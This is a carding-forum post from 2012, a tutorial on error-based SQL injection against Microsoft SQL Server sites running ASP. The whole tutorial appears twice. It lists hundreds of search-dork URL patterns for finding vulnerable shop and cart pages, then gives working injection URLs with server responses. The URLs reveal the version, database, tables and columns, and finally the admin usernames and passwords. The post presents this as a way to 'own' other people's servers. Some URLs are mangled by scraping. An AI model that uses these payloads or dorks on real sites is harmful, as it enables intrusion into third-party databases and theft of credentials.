CardingMafia Admin
03-17-2012, 03:58 PM
WE hacked lots of mySQL sites ...nw its time to target Microsoft.
hope u will enjoy it....
Lets start...
There are various types of sql injection for MICROSOFT here as follows
1)ODBC Error Message Attack with "CONVERT"
2)ODBC Error Message Attack with "HAVING" and "GROUP BY"
3)MSSQL Injection with UNION Attack
4)MSSQL Injection in Web Services (SOAP Injection)
5)MSSQL Blind SQL Injection Attack
I will be explaining various methods of sqli's in my various tuts..
So for now we will start with easiest methode of sqli with CONVERT
STEP 1:
First we need to find a vulnerable site.
By adding a single quote (') double quote ("") or a semicolon (DuDe to the field under test.
eg
IANA — Example domains (http://www.example.com/news.asp?id=10)'
IANA — Example domains (http://www.example.com/news.asp?id=10;)
It's vulnerable in SQL injection,If the output shows some error like this:
[HTTP Response]------------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/news.asp, line 52
[End HTTP Response]-------------------------------------------------------------------------
Also error could be something like below
Microsoft OLE DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
..../ main_rub.asp, line 4
If the errors like above are shown then site could be vulnerable in SQL
Also you can find vulnerable site from google dork.
eg
inurlDuDe age.asp?id=
inurl:index.asp?sid=
Code:
".asp?bookID="
".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCate gory ="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID= "
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID="
STEP 2:
Now we got our vulnerable website.
CONVERT command is used to convert between two data types and when the specific
data cannot convert to another type the error will be returned.
Now we start with our assessment by finding MSSQL_Version, DB_name.
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,@@version))
[http response]-------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
(Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
/includes/templates/header.asp, line 21
-----------------------------------------------------------
We know now,its a Microsoft SQL Server 2005 n OS (Windows 2003 Server) (Build 3790: Service Pack 2)
Let's go to enumerate DB_name.
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--)
[http response]--------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'IPC' to data type int.
/includes/templates/header.asp, line 21
------------------------------------------------------------
The data base name is IPC.
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--)
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'ipcdc' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
The use operating database is ipcdc....
STEP 3:
NOW LETS FIND TABLES IN DATABASE
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl ) e_name+from+information_schema.tables))--
"information_schema.tables" stores information about tables in databases and there is a field called "table_name"
which stores names of each table."SELECT TOP 1" will show first table in database.
The result of this request is something like this:
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'siteStatus' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
Therefore, we know the first table = "siteStatus", from this error. The next step is looking for the second table.
We only put WHERE clause append the query in above request.
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl ) e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus')))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
Second table 'headerGraphic'
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl ) e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic')))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
third table 'admin'
Like this you will get each table name from the error.
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl ) e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic','admin') ))--
If the query returns something like this.
[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22
-----------------------------------------------------------------
IT MEANS DATABASE CONTAINS ONLY 3 TABLES 'siteStatus','headerGraphic' n 'admin'.
STEP 4:
Now we are all set.....and we will find columns in admin table
We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"
but we have to add "table_name" in WHERE cluase in order to specify the table which we will pull column names from.
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+colu ) mn_name+from+information_schema.columns+where+tabl e_name='admin'))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'username' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+colu ) mn_name+from+information_schema.columns+where+tabl e_name='admin'+and+column_name+not+in+('username') ))--
the response will be
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'passwd' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
So 2nd column is 'passwd'
DO THIS LIKE WE DID URL MANIPULATION FOR TABLES....
DONT FORGET TO ADD WHERE CLAUSE.
UNTILL U GET ERROR LIKE THIS
[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22
-----------------------------------------------------------------
STEP 5: RETRIEVING USENAME n PASSWORD etc
Now lets see what we got from above
table_name: 'admin','siteStatus' n 'HeaderGraphic'
Here we are interestedin 'admin'.So we found columns fo 'admin'
column_name:'username' n 'passwd'
LETS do our work now
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+user ) name+from+admin))--
You will get first username in terms of error
eg sa_admin
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+pass ) wd+from+admin))--
You will get passwd.
eg comic123
So u own .....MSSQL server wid
USERNAME: sa_admin
PASSWORD:comic123
[note:
1) you can use AND/OR both
2) Dnt forget , (comma) after 'int' in convert()
3) In error after ' (upper comma) is your table_name of column_name or etc
4)you can enemerate more usernames n passwords by using 'not' command
]
hope u will enjoy it....
Lets start...
There are various types of sql injection for MICROSOFT here as follows
1)ODBC Error Message Attack with "CONVERT"
2)ODBC Error Message Attack with "HAVING" and "GROUP BY"
3)MSSQL Injection with UNION Attack
4)MSSQL Injection in Web Services (SOAP Injection)
5)MSSQL Blind SQL Injection Attack
I will be explaining various methods of sqli's in my various tuts..
So for now we will start with easiest methode of sqli with CONVERT
STEP 1:
First we need to find a vulnerable site.
By adding a single quote (') double quote ("") or a semicolon (DuDe to the field under test.
eg
IANA — Example domains (http://www.example.com/news.asp?id=10)'
IANA — Example domains (http://www.example.com/news.asp?id=10;)
It's vulnerable in SQL injection,If the output shows some error like this:
[HTTP Response]------------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/news.asp, line 52
[End HTTP Response]-------------------------------------------------------------------------
Also error could be something like below
Microsoft OLE DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
..../ main_rub.asp, line 4
If the errors like above are shown then site could be vulnerable in SQL
Also you can find vulnerable site from google dork.
eg
inurlDuDe age.asp?id=
inurl:index.asp?sid=
Code:
".asp?bookID="
".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCate gory ="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID= "
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID="
STEP 2:
Now we got our vulnerable website.
CONVERT command is used to convert between two data types and when the specific
data cannot convert to another type the error will be returned.
Now we start with our assessment by finding MSSQL_Version, DB_name.
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,@@version))
[http response]-------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
(Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
/includes/templates/header.asp, line 21
-----------------------------------------------------------
We know now,its a Microsoft SQL Server 2005 n OS (Windows 2003 Server) (Build 3790: Service Pack 2)
Let's go to enumerate DB_name.
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--)
[http response]--------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'IPC' to data type int.
/includes/templates/header.asp, line 21
------------------------------------------------------------
The data base name is IPC.
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--)
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'ipcdc' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
The use operating database is ipcdc....
STEP 3:
NOW LETS FIND TABLES IN DATABASE
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl ) e_name+from+information_schema.tables))--
"information_schema.tables" stores information about tables in databases and there is a field called "table_name"
which stores names of each table."SELECT TOP 1" will show first table in database.
The result of this request is something like this:
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'siteStatus' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
Therefore, we know the first table = "siteStatus", from this error. The next step is looking for the second table.
We only put WHERE clause append the query in above request.
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl ) e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus')))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
Second table 'headerGraphic'
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl ) e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic')))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
third table 'admin'
Like this you will get each table name from the error.
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl ) e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic','admin') ))--
If the query returns something like this.
[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22
-----------------------------------------------------------------
IT MEANS DATABASE CONTAINS ONLY 3 TABLES 'siteStatus','headerGraphic' n 'admin'.
STEP 4:
Now we are all set.....and we will find columns in admin table
We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"
but we have to add "table_name" in WHERE cluase in order to specify the table which we will pull column names from.
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+colu ) mn_name+from+information_schema.columns+where+tabl e_name='admin'))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'username' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+colu ) mn_name+from+information_schema.columns+where+tabl e_name='admin'+and+column_name+not+in+('username') ))--
the response will be
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'passwd' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
So 2nd column is 'passwd'
DO THIS LIKE WE DID URL MANIPULATION FOR TABLES....
DONT FORGET TO ADD WHERE CLAUSE.
UNTILL U GET ERROR LIKE THIS
[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22
-----------------------------------------------------------------
STEP 5: RETRIEVING USENAME n PASSWORD etc
Now lets see what we got from above
table_name: 'admin','siteStatus' n 'HeaderGraphic'
Here we are interestedin 'admin'.So we found columns fo 'admin'
column_name:'username' n 'passwd'
LETS do our work now
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+user ) name+from+admin))--
You will get first username in terms of error
eg sa_admin
IANA — Example domains (http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+pass ) wd+from+admin))--
You will get passwd.
eg comic123
So u own .....MSSQL server wid
USERNAME: sa_admin
PASSWORD:comic123
[note:
1) you can use AND/OR both
2) Dnt forget , (comma) after 'int' in convert()
3) In error after ' (upper comma) is your table_name of column_name or etc
4)you can enemerate more usernames n passwords by using 'not' command
]